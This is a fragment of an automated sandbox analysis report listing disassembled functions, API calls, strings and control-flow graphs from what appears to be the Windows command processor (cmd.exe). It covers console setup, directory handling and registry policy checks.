                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValue$CloseOpensrandtime
                                                                            • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                                                            • API String ID: 145004033-3846321370
                                                                            • Opcode ID: 84b9f26750c40035d8e5d8641f5b34c34b5f98efd64d51f82fe7e0fd584e5a70
                                                                            • Instruction ID: 613758e905b8306a46d89e25fb7a9333a70df789f5556ce38609a2e7ec0ca67d
                                                                            • Opcode Fuzzy Hash: 84b9f26750c40035d8e5d8641f5b34c34b5f98efd64d51f82fe7e0fd584e5a70
                                                                            • Instruction Fuzzy Hash: D5C150359402A9EADF328B11DD45BD97BB8FB08702F5080D6E689A3190DBB09BC9CF55
                                                                            Function 00B109B1 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242registrythreadmemoryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 276 b109b1-b10a12 GetCurrentThreadId OpenThread call b0e2af HeapSetInformation RegOpenKeyExW 279 b1e9c5-b1e9ea RegQueryValueExW RegCloseKey 276->279 280 b10a18-b10a50 call b11f5b call b11f1a call b087ca 276->280 282 b1e9f5-b1ea03 call b063bd call b24840 279->282 290 b10a55-b10a59 280->290 291 b1ea08-b1ea10 call b11e70 282->291 290->282 292 b10a5f-b10a66 290->292 301 b1ea12 291->301 294 b1ea58-b1ea6d _setjmp3 292->294 295 b10a6c-b10a81 _setjmp3 292->295 297 b1ea82-b1ea85 294->297 298 b1ea6f-b1ea71 294->298 299 b10a87 295->299 300 b1ea1c-b1ea24 295->300 305 b1ea87-b1ea95 call b063bd call b24840 297->305 306 b1eaaa-b1eab3 call b0dd98 297->306 298->297 302 b1ea73-b1ea7b call b11e70 298->302 303 b10a8a-b10a8c 299->303 300->303 304 b1ea2a-b1ea2d 300->304 301->300 321 b1ea7d 302->321 309 b10ac5-b10ac7 303->309 310 b10a8e 303->310 304->303 330 b1ea9a-b1eaa2 call b11e70 305->330 319 b1eab5-b1eac5 _setmode 306->319 320 b1eac6-b1eac7 call b162c0 306->320 312 b1ea52 309->312 313 b10acd-b10ad5 call b11e70 309->313 316 b10a90-b10a96 310->316 312->294 332 b10ad7 313->332 322 b10ae0-b10af1 call b0c570 316->322 323 b10a98-b10a9c 316->323 319->320 334 b1eacc-b1eaff EnterCriticalSection LeaveCriticalSection call b0c570 320->334 328 b1eb7f 321->328 338 b1ea41-b1ea49 call b11e70 322->338 339 b10af7-b10afa 322->339 323->316 329 b10a9e-b10aba call b0e310 GetConsoleOutputCP GetCPInfo call b0e2af 323->329 352 b10abf 329->352 343 b1eaa4 330->343 337 b10ada exit 332->337 351 b1eb01-b1eb04 334->351 337->322 353 b1ea4b-b1ea4d 338->353 344 b10b00-b10b04 call b0e470 339->344 345 b1ea32-b1ea3a call b11e70 339->345 343->306 354 b10b09-b10b0b 344->354 360 b1ea3c 345->360 356 b1eb75-b1eb7d call b11e70 351->356 357 b1eb06-b1eb70 EnterCriticalSection LeaveCriticalSection GetConsoleOutputCP GetCPInfo call b0e2af call b0e470 call b0e310 GetConsoleOutputCP GetCPInfo call b0e2af 351->357 352->309 353->337 354->323 359 b10b0d-b10b10 354->359 356->328 357->334 359->323 360->328
                                                                            APIs
                                                                            • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00B109CB
                                                                            • OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00B109D8
                                                                              • Part of subcall function 00B0E2AF: SetThreadUILanguage.KERNELBASE ref: 00B0E2C6
                                                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00B109ED
                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00B10A0A
                                                                            • _setjmp3.MSVCRT ref: 00B10A72
                                                                            • GetConsoleOutputCP.KERNELBASE ref: 00B10AA3
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B10AB4
                                                                            • exit.KERNELBASE ref: 00B10ADA
                                                                            • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 00B1E9E1
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B1E9EA
                                                                              • Part of subcall function 00B11F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,00B1EF7C,?,00000000,00000000), ref: 00B11FB2
                                                                              • Part of subcall function 00B11F5B: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,00B1EF7C,?,00000000,00000000), ref: 00B11FCE
                                                                              • Part of subcall function 00B11F1A: GetConsoleOutputCP.KERNELBASE(00B10A41), ref: 00B11F1A
                                                                              • Part of subcall function 00B11F1A: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B11F2B
                                                                              • Part of subcall function 00B11F1A: memset.MSVCRT ref: 00B11F45
                                                                              • Part of subcall function 00B087CA: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00B3CA04), ref: 00B087EE
                                                                              • Part of subcall function 00B087CA: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B087FA
                                                                              • Part of subcall function 00B087CA: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00B0880E
                                                                              • Part of subcall function 00B087CA: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00B27460,00000001), ref: 00B0881B
                                                                              • Part of subcall function 00B087CA: _get_osfhandle.MSVCRT ref: 00B08828
                                                                              • Part of subcall function 00B087CA: GetConsoleMode.KERNELBASE(00000000), ref: 00B08830
                                                                              • Part of subcall function 00B087CA: _get_osfhandle.MSVCRT ref: 00B0883C
                                                                              • Part of subcall function 00B087CA: GetConsoleMode.KERNELBASE(00000000), ref: 00B08844
                                                                              • Part of subcall function 00B087CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B0886A
                                                                              • Part of subcall function 00B087CA: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00B088A5
                                                                            • _setjmp3.MSVCRT ref: 00B1EA5E
                                                                            Strings
                                                                            • DisableCMD, xrefs: 00B1E9D9
                                                                            • Software\Policies\Microsoft\Windows\System, xrefs: 00B10A00
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Console$CriticalQuerySectionThread$CommandInfoLineModeOpenOutputVirtual_get_osfhandle_setjmp3$CloseCtrlCurrentEnterHandlerHeapInformationInitializeLanguageLeaveValueexitmemset
                                                                            • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                            • API String ID: 4238206819-1920437939
                                                                            • Opcode ID: 55640ee790a6f1137efdb8549918f88b0473c47d7d1abbb346ef316458a78576
                                                                            • Instruction ID: 6c59d03361ec67e76ac186b9deb6bae7d8ed10a0b62a33a900de2c9b7a5d4751
                                                                            • Opcode Fuzzy Hash: 55640ee790a6f1137efdb8549918f88b0473c47d7d1abbb346ef316458a78576
                                                                            • Instruction Fuzzy Hash: E771D775560205AEEB11ABB49C869EF3BECFF15340B6445A9F912E31A1EF70CDC08B61
                                                                            Function 00B100E9 Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 169COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 370 b100e9-b10140 memset call b0e3f0 373 b1e615-b1e61d call b11e70 370->373 374 b10146-b1014b 370->374 382 b1e61f-b1e621 exit 373->382 375 b10151-b1016a GetModuleFileNameW call b0ec2e 374->375 376 b1e627 374->376 380 b1e632-b1e63e call b0a976 375->380 384 b10170-b1017e call b0ec2e 375->384 376->380 388 b1e643-b1e64f call b0a976 380->388 382->376 384->388 389 b10184-b10192 call b0ec2e 384->389 394 b1e654-b1e660 call b0a976 388->394 389->394 395 b10198-b101a4 call b0ec2e 389->395 400 b1e665-b1e66a 394->400 395->400 401 b101aa-b101b6 call b0ec2e 395->401 402 b1e672-b1e67c call b0a62f 400->402 403 b1e66c 400->403 408 b1e714-b1e724 _wcsicmp 401->408 409 b101bc-b101c4 401->409 410 b1e6f8-b1e6fd 402->410 411 b1e67e-b1e691 _wcsupr 402->411 403->402 408->409 414 b1e72a-b1e734 408->414 412 b101c6-b101d8 call b08bc7 409->412 413 b101ee-b101f3 409->413 417 b1e705-b1e70f call b0a976 410->417 418 b1e6ff 410->418 415 b1e693 411->415 416 b1e699 411->416 424 b101e2-b101ed call b16b30 412->424 425 b101da-b101e1 ??_V@YAXPAX@Z 412->425 413->412 414->409 415->416 420 b1e69c-b1e6a5 416->420 417->408 418->417 420->420 423 b1e6a7-b1e6b0 420->423 427 b1e6b2-b1e6b8 423->427 428 b1e6ba-b1e6ce call b101f5 423->428 425->424 427->428 433 b1e6e1-b1e6e3 428->433 434 b1e6d0-b1e6d2 428->434 437 b1e6e5 433->437 438 b1e6eb 433->438 435 b1e6d4 434->435 436 b1e6da-b1e6df 434->436 435->436 439 b1e6f0-b1e6f3 call b0fc40 436->439 437->438 438->439 439->410
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B1011A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00B10156
                                                                              • Part of subcall function 00B0EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00B2E590,00002000,?,00B48BF0,00000000,?,?,00B08F0D), ref: 00B0EC51
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0EC77
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0EC8D
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECA3
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECB9
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECCF
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECE5
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ECF7
                                                                              • Part of subcall function 00B0EC2E: _wcsicmp.MSVCRT ref: 00B0ED0D
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B101DB
                                                                            • exit.MSVCRT ref: 00B1E621
                                                                            • _wcsupr.MSVCRT ref: 00B1E683
                                                                            • _wcsicmp.MSVCRT ref: 00B1E71A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                            • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                            • API String ID: 2336066422-4197029667
                                                                            • Opcode ID: b6a39c6a90511e16ba47326d9d31264f10eb426254c4e4f0efc7190af5588dc8
                                                                            • Instruction ID: 7dc85eb5acfeb4008e4f2c26ac77ca1b450d1ca16207a73f52140ed2338edb4c
                                                                            • Opcode Fuzzy Hash: b6a39c6a90511e16ba47326d9d31264f10eb426254c4e4f0efc7190af5588dc8
                                                                            • Instruction Fuzzy Hash: A651D635B402169BDF24AB608C956FE7AE5EF60704FC444E8ED12A72C0EF74DEC18691
                                                                            Function 00B08BC7 Relevance: 24.3, APIs: 16, Instructions: 312COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 441 b08bc7-b08be4 call b17d90 444 b1b5d4-b1b5d8 441->444 445 b08bea-b08c16 call b15a2e call b0e3f0 441->445 444->445 447 b1b5de-b1b5e3 444->447 452 b1b774-b1b77a call b161e6 445->452 453 b08c1c-b08c2d call b0acb0 445->453 449 b08e67-b08e76 447->449 456 b1b77f 452->456 453->452 459 b08c33-b08c3a 453->459 458 b1b781 456->458 460 b08c3d-b08c46 459->460 460->460 461 b08c48-b08c4c 460->461 462 b08c4f-b08c59 461->462 463 b08c66-b08c70 462->463 464 b08c5b-b08c60 462->464 465 b1b5f0 463->465 466 b08c76-b08c85 GetCurrentDirectoryW 463->466 464->463 467 b1b5e8-b1b5eb 464->467 468 b1b5fb 465->468 466->468 469 b08c8b-b08cb0 towupper iswalpha 466->469 467->462 471 b1b606 468->471 470 b08cb6-b08cba 469->470 469->471 470->471 472 b08cc0-b08cde towupper 470->472 474 b1b60f 471->474 473 b08ce4-b08cf8 GetFullPathNameW 472->473 472->474 475 b1b61a-b1b622 GetLastError 473->475 476 b08cfe-b08d01 473->476 474->475 477 b1b627-b1b647 call b161e6 _local_unwind4 475->477 478 b08d07-b08d0e 476->478 479 b1b64c-b1b66a call b161e6 _local_unwind4 476->479 482 b08d14-b08d19 478->482 483 b1b674 478->483 479->483 486 b1b747-b1b767 call b161e6 _local_unwind4 482->486 487 b08d1f-b08d23 482->487 490 b1b67f 483->490 486->458 489 b08d29-b08d2d 487->489 487->490 489->486 492 b08d33-b08d37 489->492 493 b1b68a 490->493 492->493 494 b08d3d 492->494 497 b1b695 493->497 495 b08d40-b08d4a 494->495 495->495 496 b08d4c-b08d52 495->496 496->497 498 b08d58 496->498 499 b1b6a0 497->499 500 b08d5b-b08d73 call b17d82 498->500 503 b1b6ab-b1b6b6 GetLastError 499->503 504 b08d82-b08d8c 500->504 505 b08d75-b08d7c 500->505 506 b08da2-b08da9 503->506 507 b1b6bc-b1b6bf 503->507 504->499 509 b08d92-b08d9c GetFileAttributesW 504->509 505->504 508 b08e77-b08e7a 505->508 511 b08dc9-b08dd2 506->511 512 b08dab-b08db0 506->512 507->506 510 b1b6c5-b1b6c8 507->510 508->500 509->503 509->506 510->477 513 b1b6ce 510->513 516 b08dd4-b08dd9 511->516 517 b08dfa-b08dfc 511->517 514 b1b6d3 512->514 515 b08db6-b08dbc call b10207 512->515 513->506 519 b1b6de 514->519 527 b08dc1-b08dc3 515->527 516->519 520 b08ddf-b08de9 GetFileAttributesW 516->520 521 b08e09-b08e0e 517->521 522 b08dfe-b08e01 517->522 528 b1b6e9-b1b6f4 GetLastError 519->528 520->528 529 b08def-b08df4 520->529 525 b08e10-b08e19 SetCurrentDirectoryW 521->525 526 b08e87-b08e8d 521->526 523 b08e03-b08e07 522->523 524 b08e1f-b08e24 522->524 523->521 523->524 530 b08e26-b08e30 call b0a976 524->530 531 b08e8f-b08e95 524->531 525->475 525->524 526->525 527->479 527->511 528->477 532 b1b6fa 528->532 529->517 533 b1b6ff-b1b722 call b161e6 _local_unwind4 529->533 539 b1b727-b1b745 call b161e6 _local_unwind4 530->539 540 b08e36-b08e3e 530->540 531->530 532->477 533->449 539->456 542 b08e40-b08e65 call b08e9e call b08e7f call b161e6 540->542 543 b08e97-b08e9c 540->543 542->449 543->542
                                                                            APIs
                                                                              • Part of subcall function 00B15A2E: memset.MSVCRT ref: 00B15A5A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00B2C9B0,00000240,00B11E92,00000000,00000000,00B1ACE0,00000000,00000000,?,00000104,?), ref: 00B08C7A
                                                                            • towupper.MSVCRT ref: 00B08C8F
                                                                            • iswalpha.MSVCRT ref: 00B08CA4
                                                                            • towupper.MSVCRT ref: 00B08CC4
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00B08CF0
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00B08D93
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00B08DE0
                                                                            • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00B08E11
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B1B6AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                            • String ID:
                                                                            • API String ID: 1133067188-0
                                                                            • Opcode ID: c4543f27f979b725e564c3cb3a36bff51d1e75c7ca03757ea1c2fef02a5056c9
                                                                            • Instruction ID: 7795ad41acdabe47d48eec40ae4123e96a160b68eeb0afbc16ef52d349705013
                                                                            • Opcode Fuzzy Hash: c4543f27f979b725e564c3cb3a36bff51d1e75c7ca03757ea1c2fef02a5056c9
                                                                            • Instruction Fuzzy Hash: C8B18D31A041159ADB28EB64DD85AFEB7F5EF24310F9446E9E45AE31E0EF309F80CA51
                                                                            Function 00B0E310 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 78COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 551 b0e310-b0e341 _get_osfhandle SetConsoleMode _get_osfhandle GetConsoleMode 552 b0e343-b0e355 551->552 553 b0e357-b0e370 _get_osfhandle GetConsoleMode 551->553 552->553 554 b0e3bc-b0e3d9 _get_osfhandle SetConsoleMode 552->554 555 b0e372-b0e37f 553->555 556 b0e3bb 553->556 554->553 559 b0e3df-b1dc17 554->559 557 b0e3a0-b0e3a9 555->557 558 b0e381-b0e39a _get_osfhandle SetConsoleMode 555->558 560 b0e3ba 557->560 561 b0e3ab-b0e3b8 557->561 558->557 559->553 563 b1dc1d-b1dc45 _get_osfhandle SetConsoleMode 559->563 560->556 561->560 563->553
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E318
                                                                            • SetConsoleMode.KERNELBASE(00000000), ref: 00B0E322
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E32F
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B0E339
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E35E
                                                                            • GetConsoleMode.KERNELBASE(00000000), ref: 00B0E368
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E390
                                                                            • SetConsoleMode.KERNELBASE(00000000), ref: 00B0E39A
                                                                            • _get_osfhandle.MSVCRT ref: 00B0E3C7
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B0E3D1
                                                                            • _get_osfhandle.MSVCRT ref: 00B1DC35
                                                                            • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00B1DC3F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleMode_get_osfhandle
                                                                            • String ID: CMD.EXE
                                                                            • API String ID: 1606018815-3025314500
                                                                            • Opcode ID: e2208a7aab44e9d8cb7020cba94710cb6b0a1627705afc31fab32c94ac85b560
                                                                            • Instruction ID: d5d56c49f5576df360143ca3a7097fcb0b9a456785ca8d947058f7f5aaa9f334
                                                                            • Opcode Fuzzy Hash: e2208a7aab44e9d8cb7020cba94710cb6b0a1627705afc31fab32c94ac85b560
                                                                            • Instruction Fuzzy Hash: 6121A1B66402009FE7154B38EC1EB2A3E54FB01755B044829F512C33F0DFB6DA058B57
                                                                            Function 00B059C0 Relevance: 15.3, APIs: 10, Instructions: 270COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 565 b059c0-b059e2 566 b059f4-b05a36 memset call b0e3f0 565->566 567 b059e4-b059ee call b10b12 565->567 573 b19a3a-b19a3d 566->573 574 b05a3c-b05a41 566->574 567->566 572 b19a27-b19a35 call b078e4 567->572 586 b05a90-b05a9e call b16b30 572->586 578 b19a50 573->578 575 b05a47-b05a5b GetFullPathNameW 574->575 576 b19a3f 574->576 579 b05a61-b05a66 575->579 580 b19a4a GetLastError 575->580 576->580 582 b19a52-b19a53 578->582 584 b19a60-b19a6f call b078e4 579->584 585 b05a6c-b05a78 CreateDirectoryW 579->585 580->578 583 b19a54-b19a5a call b078e4 582->583 583->584 593 b19a76-b19a82 call b078e4 584->593 589 b05aa1-b05aac GetLastError 585->589 590 b05a7a-b05a84 585->590 592 b05ab2-b05ab5 589->592 589->593 596 b05a86-b05a8d ??_V@YAXPAX@Z 590->596 597 b05a8e 590->597 592->582 599 b05abb-b05ac2 592->599 605 b19a8a 593->605 596->597 597->586 601 b05ac8-b05acf 599->601 602 b05b8b-b05b8e 599->602 604 b05ad5-b05adf 601->604 601->605 602->583 606 b19aa0-b19aa4 604->606 607 b05ae5-b05ae9 604->607 610 b19a95 605->610 608 b19aa6 606->608 609 b19aac-b19aaf 606->609 607->610 611 b05aef-b05af2 607->611 608->609 609->602 612 b19ab5-b19ab9 609->612 610->606 613 b05b35 611->613 614 b19ac1-b19ac5 612->614 615 b19abb 612->615 616 b05b3b-b05b41 613->616 614->602 617 b19acb-b19acf 614->617 615->614 618 b05b43-b05b49 616->618 619 b05b68-b05b6a 616->619 622 b19ad1 617->622 623 b19ad7-b19ae8 617->623 624 b05af4-b05af6 618->624 625 b05b4b-b05b5c 618->625 620 b05b83-b05b89 619->620 621 b05b6c-b05b78 CreateDirectoryW 619->621 620->621 621->590 627 b05b7e 621->627 622->623 629 b19b17-b19b1a 623->629 630 b19aea-b19af0 623->630 628 b05af7-b05b01 624->628 625->618 626 b05b5e-b05b64 625->626 626->616 631 b05b66 626->631 632 b19b7c-b19b87 GetLastError 627->632 633 b19b71 628->633 634 b05b07-b05b11 CreateDirectoryW 628->634 636 b19b27-b19b2d 629->636 637 b19b1c-b19b25 629->637 635 b19af1-b19af6 630->635 631->628 632->590 639 b19b8d 632->639 633->632 640 b05b20-b05b32 634->640 641 b05b13-b05b1e GetLastError 634->641 642 b19af8-b19b0d 635->642 643 b19b0f-b19b15 635->643 636->619 638 b19b33-b19b37 636->638 637->636 644 b19b38-b19b3d 638->644 639->582 640->613 641->602 641->640 642->635 642->643 643->629 645 b19b56-b19b61 644->645 646 b19b3f-b19b54 644->646 645->619 647 b19b67-b19b6a 645->647 646->644 646->645 647->633
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B05A10
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 00B05A53
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00B05A70
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B05A87
                                                                              • Part of subcall function 00B10B12: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B10B40
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B05AA1
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00B05B09
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B05B13
                                                                            • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 00B05B70
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B19B7C
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                                                            • String ID:
                                                                            • API String ID: 402963468-0
                                                                            • Opcode ID: 237e3ac5e895e1b50c03e24a336b39ef8f483db33c6d38d0b21decf7f009fc12
                                                                            • Instruction ID: 9955b104f8cdba01e418f4341a9dd97d0d84e2de0aeccd506ab645a582acb26d
                                                                            • Opcode Fuzzy Hash: 237e3ac5e895e1b50c03e24a336b39ef8f483db33c6d38d0b21decf7f009fc12
                                                                            • Instruction Fuzzy Hash: D791C031A006469AEB34DF659C95ABBBBF4FF89310F5440E9E50AE75C0EB709E84CB50
                                                                            Function 00B16903 Relevance: 10.6, APIs: 7, Instructions: 105sleepCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 648 b16903-b1691d call b171a8 651 b1691f-b1692e 648->651 652 b16930-b16932 651->652 653 b16948-b1694a 651->653 654 b16934-b16939 652->654 655 b1693b-b16946 Sleep 652->655 656 b1694b-b16951 653->656 654->656 655->651 657 b16953-b1695b _amsg_exit 656->657 658 b1695d-b16963 656->658 659 b16997-b1699d 657->659 660 b16991 658->660 661 b16965-b16975 call b16a7c 658->661 663 b169ba-b169bc 659->663 664 b1699f-b169b0 _initterm 659->664 660->659 665 b1697a-b1697e 661->665 666 b169c7-b169ce 663->666 667 b169be-b169c5 663->667 664->663 665->659 668 b16980-b1698c 665->668 669 b169d0-b169dd call b17000 666->669 670 b169f3-b16a05 call b109b1 666->670 667->666 672 b16a6c-b16a7b 668->672 669->670 678 b169df-b169f1 669->678 674 b16a0a-b16a19 670->674 676 b16a51-b16a58 674->676 677 b16a1b-b16a35 exit _XcptFilter 674->677 679 b16a65 676->679 680 b16a5a-b16a60 _cexit 676->680 678->670 679->672 680->679
                                                                            APIs
                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00B2CA98,0000000C), ref: 00B16940
                                                                            • _amsg_exit.MSVCRT ref: 00B16955
                                                                            • _initterm.MSVCRT ref: 00B169A9
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00B169D5
                                                                            • exit.MSVCRT ref: 00B16A1C
                                                                            • _XcptFilter.MSVCRT ref: 00B16A2E
